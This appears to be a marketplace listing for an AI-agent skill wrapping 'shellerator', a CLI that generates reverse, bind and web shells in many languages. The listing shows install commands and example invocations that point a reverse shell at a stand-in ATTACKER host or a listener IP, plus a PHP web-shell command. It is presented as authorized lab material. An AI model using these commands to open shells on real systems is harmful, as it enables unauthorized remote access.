aeondave/shellerator
offensive-tools/shells/shellerator/SKILL.md
Auth/lab ref: CLI reverse/bind-shell lab generator supporting 20+ languages with optional encoding.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill shelleratorInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Jun 8, 2026, 4:04 AM126.1s2 files scanned
SKILL.md
- name:
- shellerator
- description:
- Auth/lab ref: CLI reverse/bind-shell lab generator supporting 20+ languages with optional encoding.
- license:
- MIT
- compatibility:
- Python 3; Linux/macOS/Windows.
- author:
- AeonDave
- version:
- 1.0
Shellerator
CLI shell payload generator — reverse and bind shells for 20+ languages.
Quick Start
pipx install git+https://github.com/ShutdownRepo/shellerator
# or
uv tool install git+https://github.com/ShutdownRepo/shellerator
# Interactive mode
shellerator
# Generate bash reverse shell
shellerator -r -t bash -lh ATTACKER -lp 4444
# Generate PowerShell bind shell
shellerator -b -t powershell -lp 4444
# List all supported languages
shellerator -l
Core Flags
| Flag | Purpose |
|------|---------|
| -r | Reverse-shell mode |
| -b | Bind-shell mode |
| -w | Web-shell mode |
| -t TYPE | Payload type/language |
| -lh LHOST | Attacker/listener IP (reverse mode) |
| -lp LPORT | Port |
| -l | List supported payload types |
Supported Languages (examples)
bash · sh · python · python3 · perl · php · ruby · powershell · netcat · java · groovy · golang · lua · nodejs · socat · awk (actual set depends on upstream data catalog)
Common Workflows
Quick payload for exploit:
shellerator -r -t python3 -lh 10.10.14.5 -lp 4444
Generate PHP web shell quickly:
shellerator -w -t php
Resources
| File | When to load |
|------|--------------|
| references/mode-selection-and-cli-examples.md | Current mode flags (-r/-b/-w), installation options, and payload validation checklist |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026